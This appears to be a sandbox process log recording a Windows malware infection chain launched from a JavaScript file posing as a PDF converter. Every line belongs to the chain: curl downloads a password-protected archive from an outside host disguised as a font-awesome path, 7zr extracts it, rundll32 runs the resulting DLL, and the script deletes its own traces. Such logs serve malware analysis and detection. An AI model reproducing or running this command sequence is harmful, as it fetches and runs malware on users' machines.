wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js
3044cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
2188cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
2252curl.exe curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location
1684curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
664cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
2264et.o "C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h"
1732cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
2420cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
1116cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
2344rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
2460rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
2616cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
2972